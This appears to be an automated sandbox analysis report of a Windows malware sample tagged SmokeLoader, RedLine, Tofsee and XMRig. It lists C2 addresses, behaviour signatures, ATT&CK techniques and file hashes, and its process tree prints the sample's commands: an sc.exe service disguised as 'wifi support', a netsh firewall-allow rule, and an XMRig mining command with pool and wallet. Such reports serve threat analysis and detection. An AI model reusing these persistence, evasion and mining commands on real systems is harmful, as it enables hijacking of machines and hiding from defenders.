Overview

overview

10

Static

static

dridex

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    06-10-2021 17:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c8dac6153077c6b6b6669eb7b18c21b7cfe374d4ac17bd32786d8a5826faa47b.exe

  • Size

    199KB

  • MD5

    d4e179701494a88ee3a32b3bd22117b6

  • SHA1

    98bda43471a64e9b73793bc800258f671dd804f9

  • SHA256

    c8dac6153077c6b6b6669eb7b18c21b7cfe374d4ac17bd32786d8a5826faa47b

  • SHA512

    2283a27d1ea573dd916c8c4ebd2ddbfd2a237dd06a9081cc75f3fb87909ddba948537054239a8630dc2e52e239823958bb0ba9e6b93dcda259ed24326c864f50

Score
10/10
redlinesmokeloadertofseexmrig777backdoordiscoveryevasioninfostealerminerpersistencespywarestealersuricatathemidatrojan

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://fiskahlilian16.top/

http://paishancho17.top/

http://ydiannetter18.top/

http://azarehanelle19.top/

http://quericeriant20.top/
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

777

C2

93.115.20.139:28978

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs
    evasiontrojan
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • XMRig Miner Payload 3 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Downloads MZ/PE file
  • Executes dropped EXE 8 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 12 IoCs
  • Modifies registry class 2 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 61 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c8dac6153077c6b6b6669eb7b18c21b7cfe374d4ac17bd32786d8a5826faa47b.exe
    "C:\Users\Admin\AppData\Local\Temp\c8dac6153077c6b6b6669eb7b18c21b7cfe374d4ac17bd32786d8a5826faa47b.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:740
    • C:\Users\Admin\AppData\Local\Temp\c8dac6153077c6b6b6669eb7b18c21b7cfe374d4ac17bd32786d8a5826faa47b.exe
      "C:\Users\Admin\AppData\Local\Temp\c8dac6153077c6b6b6669eb7b18c21b7cfe374d4ac17bd32786d8a5826faa47b.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:860
  • C:\Users\Admin\AppData\Local\Temp\B31E.exe
    C:\Users\Admin\AppData\Local\Temp\B31E.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1040
    • C:\Users\Admin\AppData\Local\Temp\B31E.exe
      C:\Users\Admin\AppData\Local\Temp\B31E.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:1636
  • C:\Users\Admin\AppData\Local\Temp\B68A.exe
    C:\Users\Admin\AppData\Local\Temp\B68A.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1092
    • C:\Users\Admin\AppData\Local\Temp\B68A.exe
      C:\Users\Admin\AppData\Local\Temp\B68A.exe
      2⤵
      • Executes dropped EXE
      PID:2336
    • C:\Users\Admin\AppData\Local\Temp\B68A.exe
      C:\Users\Admin\AppData\Local\Temp\B68A.exe
      2⤵
      • Executes dropped EXE
      • Modifies system certificate store
      • Suspicious use of AdjustPrivilegeToken
      PID:2840
  • C:\Users\Admin\AppData\Local\Temp\BE7A.exe
    C:\Users\Admin\AppData\Local\Temp\BE7A.exe
    1⤵
    • Executes dropped EXE
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    PID:1796
  • C:\Users\Admin\AppData\Local\Temp\C67A.exe
    C:\Users\Admin\AppData\Local\Temp\C67A.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:2612
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ponrmlmn\
      2⤵
        PID:3964
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\brrrgxdv.exe" C:\Windows\SysWOW64\ponrmlmn\
        2⤵
          PID:2228
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create ponrmlmn binPath= "C:\Windows\SysWOW64\ponrmlmn\brrrgxdv.exe /d\"C:\Users\Admin\AppData\Local\Temp\C67A.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:540
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description ponrmlmn "wifi internet conection"
            2⤵
              PID:3876
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start ponrmlmn
              2⤵
                PID:2820
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:1168
              • C:\Windows\SysWOW64\ponrmlmn\brrrgxdv.exe
                C:\Windows\SysWOW64\ponrmlmn\brrrgxdv.exe /d"C:\Users\Admin\AppData\Local\Temp\C67A.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2232
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:4016
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1924

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Initial Access

              Execution

              Persistence

              New Service

              1
              T1050

              Modify Existing Service

              1
              T1031

              Registry Run Keys / Startup Folder

              1
              T1060

              Privilege Escalation

              New Service

              1
              T1050

              Defense Evasion

              Disabling Security Tools

              1
              T1089

              Modify Registry

              3
              T1112

              Virtualization/Sandbox Evasion

              1
              T1497

              Install Root Certificate

              1
              T1130

              Credential Access

              Credentials in Files

              2
              T1081

              Discovery

              Query Registry

              4
              T1012

              Virtualization/Sandbox Evasion

              1
              T1497

              System Information Discovery

              4
              T1082

              Peripheral Device Discovery

              1
              T1120

              Lateral Movement

              Collection

              Data from Local System

              2
              T1005

              Exfiltration

              Command and Control

              Impact

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\B68A.exe.log
                MD5

                41fbed686f5700fc29aaccf83e8ba7fd

                SHA1

                5271bc29538f11e42a3b600c8dc727186e912456

                SHA256

                df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                SHA512

                234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\B31E.exe
                MD5

                d4e179701494a88ee3a32b3bd22117b6

                SHA1

                98bda43471a64e9b73793bc800258f671dd804f9

                SHA256

                c8dac6153077c6b6b6669eb7b18c21b7cfe374d4ac17bd32786d8a5826faa47b

                SHA512

                2283a27d1ea573dd916c8c4ebd2ddbfd2a237dd06a9081cc75f3fb87909ddba948537054239a8630dc2e52e239823958bb0ba9e6b93dcda259ed24326c864f50

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\B31E.exe
                MD5

                d4e179701494a88ee3a32b3bd22117b6

                SHA1

                98bda43471a64e9b73793bc800258f671dd804f9

                SHA256

                c8dac6153077c6b6b6669eb7b18c21b7cfe374d4ac17bd32786d8a5826faa47b

                SHA512

                2283a27d1ea573dd916c8c4ebd2ddbfd2a237dd06a9081cc75f3fb87909ddba948537054239a8630dc2e52e239823958bb0ba9e6b93dcda259ed24326c864f50

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\B31E.exe
                MD5

                d4e179701494a88ee3a32b3bd22117b6

                SHA1

                98bda43471a64e9b73793bc800258f671dd804f9

                SHA256

                c8dac6153077c6b6b6669eb7b18c21b7cfe374d4ac17bd32786d8a5826faa47b

                SHA512

                2283a27d1ea573dd916c8c4ebd2ddbfd2a237dd06a9081cc75f3fb87909ddba948537054239a8630dc2e52e239823958bb0ba9e6b93dcda259ed24326c864f50

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\B68A.exe
                MD5

                4e77860c3d327d661d481433cd7c2b7f

                SHA1

                27ec68f26eb1b36044d71a64d2d399b06d2248a4

                SHA256

                48f51e29fc5411f2193d99ff98a4c6d9a6c92623125255442a0620e12993c747

                SHA512

                7a3b2c56911e82f17bca41fc4260c81a8287244497e88e1bdb6017901a632402d796a0f207402ed3ca975d6c8d37f2575057829f0459ab9616efcefb274429ca

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\B68A.exe
                MD5

                4e77860c3d327d661d481433cd7c2b7f

                SHA1

                27ec68f26eb1b36044d71a64d2d399b06d2248a4

                SHA256

                48f51e29fc5411f2193d99ff98a4c6d9a6c92623125255442a0620e12993c747

                SHA512

                7a3b2c56911e82f17bca41fc4260c81a8287244497e88e1bdb6017901a632402d796a0f207402ed3ca975d6c8d37f2575057829f0459ab9616efcefb274429ca

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\B68A.exe
                MD5

                4e77860c3d327d661d481433cd7c2b7f

                SHA1

                27ec68f26eb1b36044d71a64d2d399b06d2248a4

                SHA256

                48f51e29fc5411f2193d99ff98a4c6d9a6c92623125255442a0620e12993c747

                SHA512

                7a3b2c56911e82f17bca41fc4260c81a8287244497e88e1bdb6017901a632402d796a0f207402ed3ca975d6c8d37f2575057829f0459ab9616efcefb274429ca

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\B68A.exe
                MD5

                4e77860c3d327d661d481433cd7c2b7f

                SHA1

                27ec68f26eb1b36044d71a64d2d399b06d2248a4

                SHA256

                48f51e29fc5411f2193d99ff98a4c6d9a6c92623125255442a0620e12993c747

                SHA512

                7a3b2c56911e82f17bca41fc4260c81a8287244497e88e1bdb6017901a632402d796a0f207402ed3ca975d6c8d37f2575057829f0459ab9616efcefb274429ca

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\BE7A.exe
                MD5

                d0ec4cce8f1b67dc68a8ffa16915e0ba

                SHA1

                25c0736405030f1704c52684ef4f64617dbf669a

                SHA256

                0d2e9322d0fc40f66ab6e80d0dce1b9131cefff5ac3a7d95d3b8f8d07b5523bd

                SHA512

                d5d5e30dd8c4d4f782016127436ef822774d86de54470c903c47a5080607180d571607c0afc54e707f95c879716055249aefae3bfd2549ee8a751ae818b6b022

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\C67A.exe
                MD5

                a4efcb567fd2172148ecc823d2cb7200

                SHA1

                21b127ee0ddf472b2a1ae31a2d77254c44701fcb

                SHA256

                7947dfc0ed0d455086f2db611fc810a0616b24b8230d6ff82d0d7f50e4b80f96

                SHA512

                e76e88a557ba6ca1bd864e40c434de73a160addc9d102594dc72fb99911ecd7940135d35b3c3e5d01616364438f1df7980a76e3de63a49b1403e7974b500a322

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\C67A.exe
                MD5

                a4efcb567fd2172148ecc823d2cb7200

                SHA1

                21b127ee0ddf472b2a1ae31a2d77254c44701fcb

                SHA256

                7947dfc0ed0d455086f2db611fc810a0616b24b8230d6ff82d0d7f50e4b80f96

                SHA512

                e76e88a557ba6ca1bd864e40c434de73a160addc9d102594dc72fb99911ecd7940135d35b3c3e5d01616364438f1df7980a76e3de63a49b1403e7974b500a322

                Download Submit
              • C:\Users\Admin\AppData\Local\Temp\brrrgxdv.exe
                MD5

                1115ef2f3bdd6dc9c13a8a747c3f8df2

                SHA1

                73db55e6b4603b008a5397bb15c7150f7ab438c5

                SHA256

                d65cbaca0283839665e1de6a496c4e4c7661b737e1650ea0793d8937ce2384ad

                SHA512

                4545fb29ee0a07c1f7e6ae5255c1077a8bfdbc3f165ccc23420bfaae7cdb7e03d39a61dd19d5e3a147767c91253f8e2f3b1b6df8913f424d0d151adfcb29bcc1

                Download Submit
              • C:\Windows\SysWOW64\ponrmlmn\brrrgxdv.exe
                MD5

                1115ef2f3bdd6dc9c13a8a747c3f8df2

                SHA1

                73db55e6b4603b008a5397bb15c7150f7ab438c5

                SHA256

                d65cbaca0283839665e1de6a496c4e4c7661b737e1650ea0793d8937ce2384ad

                SHA512

                4545fb29ee0a07c1f7e6ae5255c1077a8bfdbc3f165ccc23420bfaae7cdb7e03d39a61dd19d5e3a147767c91253f8e2f3b1b6df8913f424d0d151adfcb29bcc1

                Download Submit
              • memory/540-154-0x0000000000000000-mapping.dmp
                Download
              • memory/740-116-0x0000000000030000-0x0000000000039000-memory.dmp
                Filesize

                36KB

                Download
              • memory/860-114-0x0000000000400000-0x0000000000409000-memory.dmp
                Filesize

                36KB

                Download
              • memory/860-115-0x0000000000402F18-mapping.dmp
                Download
              • memory/1040-118-0x0000000000000000-mapping.dmp
                Download
              • memory/1092-134-0x0000000005710000-0x0000000005711000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1092-133-0x0000000005200000-0x0000000005201000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1092-130-0x0000000005050000-0x0000000005051000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1092-126-0x00000000050D0000-0x00000000050D1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1092-124-0x0000000000870000-0x0000000000871000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1092-121-0x0000000000000000-mapping.dmp
                Download
              • memory/1168-170-0x0000000000000000-mapping.dmp
                Download
              • memory/1636-128-0x0000000000402F18-mapping.dmp
                Download
              • memory/1796-145-0x0000000005370000-0x0000000005371000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1796-137-0x0000000005900000-0x0000000005901000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1796-141-0x0000000005330000-0x0000000005331000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1796-146-0x00000000052F0000-0x00000000058F6000-memory.dmp
                Filesize

                6.0MB

                Download
              • memory/1796-140-0x0000000077D80000-0x0000000077F0E000-memory.dmp
                Filesize

                1.6MB

                Download
              • memory/1796-190-0x00000000079C0000-0x00000000079C1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1796-182-0x0000000007000000-0x0000000007001000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1796-178-0x0000000006C70000-0x0000000006C71000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1796-176-0x00000000071A0000-0x00000000071A1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1796-175-0x0000000006AA0000-0x0000000006AA1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1796-139-0x0000000005400000-0x0000000005401000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1796-138-0x00000000031B0000-0x00000000031B1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1796-131-0x0000000000000000-mapping.dmp
                Download
              • memory/1796-135-0x00000000013D0000-0x00000000013D1000-memory.dmp
                Filesize

                4KB

                Download
              • memory/1924-195-0x000000000119259C-mapping.dmp
                Download
              • memory/1924-196-0x0000000001100000-0x00000000011F1000-memory.dmp
                Filesize

                964KB

                Download
              • memory/1924-191-0x0000000001100000-0x00000000011F1000-memory.dmp
                Filesize

                964KB

                Download
              • memory/2228-152-0x0000000000000000-mapping.dmp
                Download
              • memory/2232-180-0x0000000000400000-0x0000000000443000-memory.dmp
                Filesize

                268KB

                Download
              • memory/2536-150-0x0000000000890000-0x00000000008A5000-memory.dmp
                Filesize

                84KB

                Download
              • memory/2536-117-0x0000000002720000-0x0000000002735000-memory.dmp
                Filesize

                84KB

                Download
              • memory/2612-142-0x0000000000000000-mapping.dmp
                Download
              • memory/2612-148-0x00000000001C0000-0x00000000001D3000-memory.dmp
                Filesize

                76KB

                Download
              • memory/2612-149-0x0000000000400000-0x0000000000443000-memory.dmp
                Filesize

                268KB

                Download
              • memory/2820-168-0x0000000000000000-mapping.dmp
                Download
              • memory/2840-155-0x0000000000400000-0x0000000000422000-memory.dmp
                Filesize

                136KB

                Download
              • memory/2840-156-0x000000000041B232-mapping.dmp
                Download
              • memory/2840-167-0x0000000005640000-0x0000000005C46000-memory.dmp
                Filesize

                6.0MB

                Download
              • memory/3876-162-0x0000000000000000-mapping.dmp
                Download
              • memory/3964-151-0x0000000000000000-mapping.dmp
                Download
              • memory/4016-172-0x0000000000B99A6B-mapping.dmp
                Download
              • memory/4016-171-0x0000000000B90000-0x0000000000BA5000-memory.dmp
                Filesize

                84KB

                Download